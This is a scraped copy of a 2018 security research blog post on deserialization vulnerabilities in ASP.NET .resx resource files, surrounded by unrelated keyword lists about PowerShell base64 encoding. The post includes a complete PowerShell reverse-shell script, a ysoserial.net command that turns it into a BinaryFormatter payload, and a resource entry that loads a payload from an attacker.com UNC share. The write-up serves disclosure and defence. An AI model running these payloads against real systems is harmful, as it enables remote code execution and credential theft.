ASP.NET resource files (.RESX) and deserialization issues - powershell base64 decode to file

---

• (1) powershell base64 encode binary file
• (2) powershell get base64 of file
• (3) powershell base64 encode file
• (4) powershell convert base64 to text

Published date: 02 August 2018, Written by: Soroush Dalili (@irsdl)
ASP.NET resource files (.RESX) and deserialization issues
Resource files in ASP.NET applications are normally used for localisation. They can be used to store
user interface objects or strings that can be painlessly translated into other languages [1]. These
resource files use the .resx extension. A .resx file can also be compiled to be consumed by an
application; in this case, it uses the .resources extension.
These resource files are in XML format but they can contain serialized objects. Binary objects can be
serialized and stored in base64 encoded format within the .resx files. Resources support
BinaryFormatter, SoapFormatter, and TypeConverters, which can all be abused to deserialize
unsafe objects or to load external files. More information from Microsoft about the resource files can be
read online [2][3].
Although deserialization issues within .resx files have been mentioned in the past [4], I am not aware
that it has ever been discussed in detail. This blog post therefore aims to discuss this attack vector in
more detail to increase awareness of it.
The identified issues used during this research were inspired by the whitepaper written by Alvaro Mu?oz
and Oleksandr Mirosh, Friday the 13th JSON Attacks [5].
1.1 Patches and remaining issues
I originally reported a number of deserialization issues within the resource files (.resx and .resources)
to Microsoft in January 2018. In July 2018 [6], Microsoft issued multiple patches (CVE-2018-8172, CVE-
2018-8172, and CVE-2018-8300) for a number of products such as SharePoint and Visual Studio that
were previously handling resource files unsafely [7].

Since the July 2018 patch, .resx and .resources files that have the Mark of the Web (MOTW) [8]
cannot be opened directly in Visual Studio. The resgen.exe tool [9] also shows an error when MOTW
is in place while the winres.exe tool [10] shows a warning message at all times. It should be noted
that resource files that are extracted from compressed files or downloaded by browsers other than IE
or Edge might not have the MOTW and should be handled with care.
The System.Resources namespace documentation in Microsoft Developer Network (MSDN) [11] has
also been updated to include the following security note for the ResourceManager, ResourceReader,
and ResourceSet methods:
"Calling methods in this class with untrusted data is a security risk. Call the methods in the class only
with trusted data. For more information, see Untrusted Data Security Risks".
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-
files-resx-and-deserialisation-issues/
Published date: 02 August 2018, Written by: Soroush Dalili (@irsdl)
It should be noted that the behaviour of the System.Resources methods has not been changed. As a
result, all applications that use ASP.NET libraries to read, compile, or decompile resource files (see [12]
and [13] for examples) can be potentially vulnerable if they accept user-provided resources.
1.2 How is System.Resources namespace affected?
As serialized object types within the resource files cannot be determined in advance, there is no
protection against code execution via unsafe deserialization. Although some of the methods can be
secured when BinaryFormatter is used, it will not be sufficient to prevent all the attacks as
SoapFormatter or TypeConverters can be used as alternatives.
Resource files can also be used to point at local files or shared resources using UNC paths. This can
lead to a minor issue of file enumeration or SMB hash hijacking when these files are processed. The
risk of SMB hash hijacking can be higher when client-side tools are being targeted.
As .resx files are based on XML, customised parsers could potentially be vulnerable to XML External
Entity (XXE) attacks when reading the resource files using normal XML libraries. By default however,
the ResXResourceReader class uses XmlTextReader that does not process the Document Type
Definition (DTD) part.
1.2.1 Technical details
Objects can be deserialized within the resources using the mimetype attribute of the data and
metadata tags. Additionally, the type attribute can be used to deserialize an object using
TypeConverters.
BinaryFormatter and SoapFormatter deserialization
An object within a resource file is deserialized with BinaryFormatter
(System.Runtime.Serialization.Formatters.Binary.BinaryFormatter) when:
The mimetype attribute is provided with an empty value for the data tag, or;
The mimetype attribute is one of the following for the data or metadata tags:
application/x-microsoft.net.object.binary.base64
text/microsoft-urt/psuedoml-serialized/base64
text/microsoft-urt/binary-serialized/base64
An object within a resource file is deserialized with SoapFormatter
(System.Runtime.Serialization.Formatters.Soap.SoapFormatter) when:
The mimetype attribute is one of the following for the data or metadata tags:
application/x-microsoft.net.object.soap.base64
text/microsoft-urt/soap-serialized/base64
Based on the source code [14], the SoapFormatter is not used via System.Web. However, this can still
be executed by uploading a resource file into the resource folder of an ASP.NET web application.
The ysoserial.net project [15] could be used to generate a payload without prior knowledge of
deserialization issues. The following example shows how a BinaryFormatter payload with a
PowerShell reverse shell could be generated:
$command = '$client = New-Object System.Net.Sockets.TCPClient("remote_IP_here",
remote_PORT_here);$stream = $client.GetStream();[byte[]]$bytes =
0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data =
(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback
= (iex $data 2>&1 | Out-String );$sendback2 =$sendback + "PS " + (pwd).Path + ">
";$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.
Length);$stream.Flush()};$client.Close()'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-
files-resx-and-deserialisation-issues/
Published date: 02 August 2018, Written by: Soroush Dalili (@irsdl)
./ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c
"powershell.exe -encodedCommand $encodedCommand"
The generated payload could then be used in a resource file as shown below:
[Resource file default scheme and headers redacted]

[BinaryFormatter payload goes here without the square brackets]

Deserialization via TypeConverters
Resource files used TypeConverters in a number of scenarios. However, the supported type, that was
checked using the CanConvertFrom method, was also important. An attacker could execute code using
the ConvertFrom method by finding suitable class files. More information about these attacks can be
read in the whitepaper, Friday the 13th JSON Attacks [5].
The following scenarios show the usage of TypeConverters in resource files with a fully qualified
assembly name as the type attribute:
When application/x-microsoft.net.object.bytearray.base64 is in mimetype:
Base64 ByteArray Payload Here
It requires a class file that accepts the byte[] type in CanConvertFrom.
Or, when the mimetype attribute is not available and the type attribute is not null and does not
contain the System.Byte[] and mscorlib strings:

String Payload Here

It requires a class file that accepts the String type in CanConvertFrom.
Or, an external file path using the System.Resources.ResXFileRef type could be included:

UNC_PATH_HERE; A Fully Qualified Assembly Name Here

It supported String, Byte[], and MemoryStream types when getting the type of the fully
qualified assembly name. This can be abused to load another resource file that contained
malicious serialized objects. This can be useful to bypass potential restrictions on the initial
resource files. The following data tag shows an example:


\\attacker.com\payload.resx; System.Resources.ResXResourceSet,
System.Windows.Forms, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=b77a5c561934e089


The ResXFileRef type can also be used for file enumeration via error messages. SMB hash
hijacking was also possible via UNC paths. An example is:

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-
files-resx-and-deserialisation-issues/


What is Base64 and how to encode and decode text? What Is Base64 and How To Encode and Decode Text? Data Presentation. Base64 uses alphabet, numbers and = for encoded data. Base64 Is Not Encryption. Base64 is just encoding format so it is not used to encrypt data to hide from third parties. ... Linux Base64. Now we will look some examples about to encrypt and decrypt Base64 in Linux bash environment. ... Javascript Base64. ... PHP Base64. ...

• Base64 decode pdf file php
• Write base64 string to pdf file java online editor download 64-bit
• Fileless Malware Execution with PowerShell Is Easier than …
• Powershell base64 encode pdf
• PowerDecode: a PowerShell Script Decoder Dedicated to …